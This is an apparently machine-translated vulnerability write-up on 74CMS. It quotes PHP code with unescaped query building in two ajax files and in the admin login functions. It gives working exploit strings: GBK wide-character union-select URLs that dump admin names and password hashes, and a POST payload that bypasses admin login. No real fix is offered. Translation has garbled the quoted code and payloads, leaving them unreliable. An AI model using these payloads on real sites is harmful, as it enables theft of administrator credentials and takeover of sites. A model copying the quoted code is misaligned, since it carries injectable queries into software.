74CMS (server guard talent system) injection (available in the background)

The entire program is completely filtered, but all versions are GBK encoding, which is hard to crack. But basically, when the string is stored in the database, the author uses iconv to convert the submitted data encoding to utf8.

Therefore, we can't use wide character injection, but we can only filter out the latest versions before version 3.2. The plus directory has a few more files. I don't know if it's a programmer... let's start with two idiots ~

Injection 1:

\ Plus \ ajax_officebuilding.php (16 rows)

If ($ act = 'alphabet ')
{
$ Alphabet = trim ($ _ GET ['X']); // smile is definitely a programmer.
If (! Empty ($ alphabet ))
{
$ Result = $ db-> query ("select * from ". table ('category '). "where c_alias = 'qs _ officebuilding 'AND c_index =' {$ alphabet} '"); // smile
While ($ row = $ db-> fetch_array ($ result ))
{
If ($ listtype = "li ")
{
$ Htm. = "<li title = \" {$ row ['C _ name']} \ "id = \" {$ row ['C _ id']} \ "> {$ row ['C _ name']} </li> ";
}
Else
{
$ Htm. = "<li> <a href = \"? Officebuildingid = {$ row ['C _ id']} \ "title = \" {$ row ['C _ note']} \ "class = \" vtip \ "> {$ row ['C _ name'] }</a> <span >{$ row ['stat _ job'] }</span> </li> ";
}
}
If (empty ($ htm ))
{
$ Htm = "<span class = \" noinfo \ "> the office building with the initial letter <span >{$ alphabet} </span> was not found! </Span> ";
}
$ Htm. = "<script type = \" text/javascript \ "> vtip (); </script> ";
Exit ($ htm );
}
}

Inject 2: \ plus \ ajax_street.php (16 rows)

If ($ act = 'alphabet ')
{
$ Alphabet = trim ($ _ GET ['X']); // It is almost the same as the above injection.
If (! Empty ($ alphabet ))
{
$ Result = $ db-> query ("select * from ". table ('category '). "where c_alias = 'qs _ Street' AND c_index = '{$ alphabet}'"); // smile
While ($ row = $ db-> fetch_array ($ result ))
{
If ($ listtype = "li ")
{
$ Htm. = "<li title = \" {$ row ['C _ name']} \ "id = \" {$ row ['C _ id']} \ "> {$ row ['C _ name']} </li> ";
}
Else
{
$ Htm. = "<li> <a href = \"? Streetid = {$ row ['C _ id']} \ "title = \" {$ row ['C _ note']} \ "class = \" vtip \ "> {$ row ['C _ name'] }</a> <span >{$ row ['stat _ job'] }</span> </li> ";
}
}
If (empty ($ htm ))
{
$ Htm = "<span class = \" noinfo \ "> the path with the initial letter <span >{$ alphabet} </span> is not found! </Span> ";
}
Exit ($ htm );
}
}
Exp:

1. plus/ajax_officebuilding.php? Act = alphabet & x = 11% d5 '% 20 union % 20 select % ,,2, 3, concat (0x3C2F613E20), 5, 6, 7, concat www.2cto.com (Region, admin_name, 0x3A, pwd, 0x3C623E205E5F5E3C2F623E), 9% 20 from % 20qs_admin % 23

2. plus/ajax_street.php? Act = alphabet & x = 11% d5 '% 20 union % 20 select % ,,2, 3, concat (0x3C2F613E20), 5, 6, 7, concat (Clerk, admin_name, 0x3A, pwd, 0x3C623E205E5F5E3C2F623E), 9% 20 from % 20qs_admin % 23

 
 

All those who have read this program should know that injection is useless because hash cannot be solved. I did not carefully look at the encryption method of his password. Anyway, he tried encryption multiple times and did not solve a dozen of them....

So it's a little lethal. Otherwise, isn't it a white box? Then, I searched some dangerous function execution variables in batches and wrote the file, and found nothing to do. I continued to turn the target to the background and immediately smiled ~ ~

\ Admin \ admin_login.php (42 rows)

Elseif ($ act = 'do _ login ')
{
Header ("Expires: Mon, 26 Jul 1997 05:00:00 GMT ");
Header ("Cache-Control: no-cache, must-revalidate ");
Header ("Pragma: no-cache ");
$ Admin_name = isset ($ _ POST ['admin _ name'])? Trim ($ _ POST ['admin _ name']): ''; // not filtered ~~~
$ Admin_pwd = isset ($ _ POST ['admin _ pwd'])? Trim ($ _ POST ['admin _ pwd']): '';
$ Postcaptcha = isset ($ _ POST ['postcaptcha '])? $ _ POST ['postcaptcha ']: '';
$ Remember = isset ($ _ POST ['memberme'])? Intval ($ _ POST ['memberme']): 0;

If ($ admin_name = '')
{
Header ("Location :? Act = login & err = ". urlencode ('user name cannot be blank '));
Exit ();
}
Elseif ($ admin_pwd = '')
{
Header ("Location :? Act = login & err = ". urlencode ('password cannot be blank '));
Exit ();
}
$ Captcha = get_cache ('captcha ');
If (empty ($ postcaptcha) & $ captcha ['verify _ adminlogin'] = '1 ')
{
Header ("Location :? Act = login & err = ". urlencode ('verification Code cannot be blank '));
Exit ();
}
If ($ captcha ['verify _ adminlogin'] = '1' & strcasecmp ($ _ SESSION ['imagecaptcha _ content'], $ postcaptcha )! = 0)
{
Write_log ("<span style = \" color: # FF0000 \ "> Incorrect verification code </span>", $ admin_name, 2 );
Header ("Location :? Act = login & err = ". urlencode ('verification code filled incorrectly '));
Exit ();
}
Elseif (check_admin ($ admin_name, $ admin_pwd) // key functions are directly included.
{
Update_admin_info ($ admin_name );
Write_log ("successfully logged on", $ admin_name );
If ($ remember = 1)
{
$ Admininfo = get_admin_one ($ admin_name );
Setcookie ('qishi [admin_id] ', $ _ SESSION ['admin _ id'], time () + 86400, $ QS_cookiepath, $ QS_cookiedomain );
Setcookie ('qishi [admin_name] ', $ admin_name, time () + 86400, $ QS_cookiepath, $ QS_cookiedomain );
Setcookie ('qishi [admin_pwd] ', md5 ($ admin_name. $ admininfo ['pwd']. $ admininfo ['pwd _ hash']. $ QS_pwdhash), time () plus 86400, $ QS_cookiepath, $ QS_cookiedomain );
}
}
Else
{
Write_log ("<span style = \" color: # FF0000 \ "> incorrect username or password </span>", $ admin_name, 2 );
Header ("Location :? Act = login & err = ". urlencode ('user name or password error '));
Exit ();
}
Header ("Location: admin_index.php ");
}
Continue to query the check_admin function: \ admin \ include \ admin_common.fun.php (row 197)

Function check_admin ($ name, $ pwd)
{
Global $ db, $ QS_pwdhash;

$ Admin = get_admin_one ($ name); // adds the program name to this function for a query.
$ Md5_pwd = md5 ($ pwd. $ admin ['pwd _ hash']. $ QS_pwdhash );
$ Row = $ db-> getone ("select count (*) AS num FROM ". table ('admin '). "WHERE admin_name = '$ name' and pwd = '". $ md5_pwd. "'"); // continue the query
If ($ row ['num']> 0 ){
Return true;
} Else {
Return false;
}
}
Let's take a look at the get_admin_one function: \ admin \ include \ admin_common.fun.php (row 237)

Function get_admin_one ($ username ){
Global $ db;
$ SQL = "select * from". table ('admin'). "where admin_name = '". $ username. "'limit 1"; // you can directly Query
Return $ db-> getone ($ SQL );
}
The get_admin_one function and the check_admin function are both directly included in the query. Except for the filter by the addslashes function starting with "POST", these are all in the face of wide characters ~~

So... directly to admin_login.php? Act = do_login can directly construct the following POST statement into the background ~~ Of course, you must have the background path:

Admin_name = fuckyou % d5 'or 1 = 1% 23 & admin_pwd = 1
Proof of vulnerability:

Solution:
Come on
Author: kiddie